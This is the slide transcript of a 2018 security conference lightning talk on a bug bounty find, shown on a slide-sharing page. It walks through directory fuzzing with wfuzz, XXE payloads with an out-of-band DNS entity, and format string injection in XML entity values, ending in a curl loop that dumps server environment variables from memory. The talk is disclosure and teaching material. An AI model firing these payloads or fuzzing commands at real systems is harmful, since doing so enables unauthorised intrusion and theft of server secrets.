$30 off During Our Annual Pro Sale. View Details »

Web based format injection, dumping memory like...

Avatar for Frans Rosén Frans Rosén
September 19, 2018
Research
0
180

Web based format injection, dumping memory like it's 99 (or "Please help")

My lightning talk from Sec-T Stockholm in September 2018.

Avatar for Frans Rosén

Frans Rosén

September 19, 2018
Tweet

More Decks by Frans Rosén

See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
Avatar for Frans Rosén fransrosen
0
1.8k
Story of a RCE on Apple through hot jar swapping
Avatar for Frans Rosén fransrosen
0
1.3k
Account hijacking using "dirty dancing" in sign-in OAuth-flows
Avatar for Frans Rosén fransrosen
0
340
A methodology using fuzzing and info disclosure
Avatar for Frans Rosén fransrosen
0
410
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Avatar for Frans Rosén fransrosen
3
9.5k
A story of the passive aggressive sysadmin of AEM
Avatar for Frans Rosén fransrosen
0
8.6k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Avatar for Frans Rosén fransrosen
3
7.5k

Other Decks in Research

See All in Research
GPUを利用したStein Particle Filterによる点群6自由度モンテカルロSLAM
Avatar for TakumiNakao takuminakao
0
620
SkySense V2: A Unified Foundation Model for Multi-modal Remote Sensing
Avatar for SatAI.challenge satai
3
160
IMC の細かすぎる話 2025
Avatar for @smly smly
2
780
論文紹介: ReGenesis: LLMs can Grow into Reasoning Generalists via Self-Improvement
Avatar for Hisao Katsumi hisaokatsumi
0
140
ドメイン知識がない領域での自然言語処理の始め方
Avatar for Hayahide Yamagishi hargon24
1
210
EarthDial: Turning Multi-sensory Earth Observations to Interactive Dialogues
Avatar for SatAI.challenge satai
3
410
湯村研究室の紹介2025 / yumulab2025
Avatar for yumulab yumulab
0
240
Thirty Years of Progress in Speech Synthesis: A Personal Perspective on the Past, Present, and Future
Avatar for Keiichi Tokuda ktokuda
0
120
機械学習と数理最適化の融合 (MOAI) による革新
Avatar for MIKIO KUBO mickey_kubo
1
430
[Devfest Incheon 2025] 모두를 위한 친절한 언어모델(LLM) 학습 가이드
Avatar for Beomi beomi
2
1k
財務諸表監査のための逐次検定
Avatar for MasaKat0 masakat0
0
210
国際論文を出そう!ICRA / IROS / RA-L への論文投稿の心構えとノウハウ / RSJ2025 Luncheon Seminar
Avatar for koide3 koide3
10
6.3k

Featured

See All Featured
Design and Strategy: How to Deal with People Who Don’t "Get" Design
Avatar for Morgane Peng morganepeng
132
19k
[RailsConf 2023] Rails as a piece of cake
Avatar for Vladimir Dementyev palkan
58
6.2k
The World Runs on Bad Software
Avatar for Brandon Keepers bkeepers
PRO
72
12k
Principles of Awesome APIs and How to Build Them.
Avatar for Keavy McMinn keavy
127
17k
Designing Experiences People Love
Avatar for Jonathan Moore moore
143
24k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
231
22k
Dealing with People You Can't Stand - Big Design 2015
Avatar for Cassini Nazir cassininazir
367
27k
Building Better People: How to give real-time feedback that sticks.
Avatar for Will Jessup wjessup
370
20k
Building Applications with DynamoDB
Avatar for Matt Wood mza
96
6.8k
Code Review Best Practice
Avatar for Trisha Gee trishagee
74
19k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
Avatar for Sam Stephenson sstephenson
162
16k
CSS Pre-Processors: Stylus, Less & Sass
Avatar for Bermon Painter bermonpainter
359
30k

Transcript

  1. @fransrosen Web based format injection, dumping memory like it's 99

    or "Please help"

  2. @fransrosen Public Bug Bounty

  3. @fransrosen RCE is 30,000 USD

  4. @fransrosen Methodology • Found a domain not like the other

    ones

  5. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization

  6. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available

  7. @fransrosen Methodology • Found a domain not like the other

    ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍

  8. @fransrosen Methodology • Google + GitHub etc

  9. @fransrosen Methodology • Google + GitHub etc

  10. @fransrosen Methodology • Google + GitHub etc

  11. @fransrosen Methodology • Google + GitHub etc

  12. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  13. @fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting

    path: /cgi-bin/default/

  14. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ

  15. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  16. @fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/

  17. @fransrosen Methodology • Google + GitHub etc • wfuzz! python

    wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \
 -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ

  18. @fransrosen Methodology • Google + GitHub etc • wfuzz!

  19. @fransrosen xml_api?

  20. @fransrosen xml_api?

  21. @fransrosen xml_api? YEAH! 👍

  22. @fransrosen wtf!?

  23. @fransrosen XXE!

  24. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  25. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">

  26. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  27. @fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  28. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  29. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>

    <Envelope><Body><exec><transaction>&exl;</transaction>
 </exec></Body></Envelope>

  30. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  31. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  32. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;

    ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???

  33. @fransrosen

  34. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  35. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  36. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  37. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  38. @fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>

    <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.

  39. @fransrosen Format String Injection?

  40. @fransrosen Format String Injection ON ZE WEB?

  41. @fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf

  42. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  43. @fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM

    "%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  44. @fransrosen I can’t handle this shit

  45. @fransrosen Help me, zetatwo

  46. @fransrosen Help me, zetatwo

  47. @fransrosen Help me, zetatwo

  48. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  49. @fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY

    exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>

  50. @fransrosen Limitations 0x20-0xFF (no 0x22)

  51. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  52. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  53. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  54. @fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff

  55. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  56. @fransrosen We can read all ENVs for i in $(seq

    8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?>
 <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]>
 <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'

  57. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  58. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  59. @fransrosen Response "We are unable to see anything sensitive in

    the response. If you believe you have found sensitive information please provide this to us."

  60. @fransrosen Want to collaborate? @fransrosen

  61. @fransrosen Questions? Suggestions?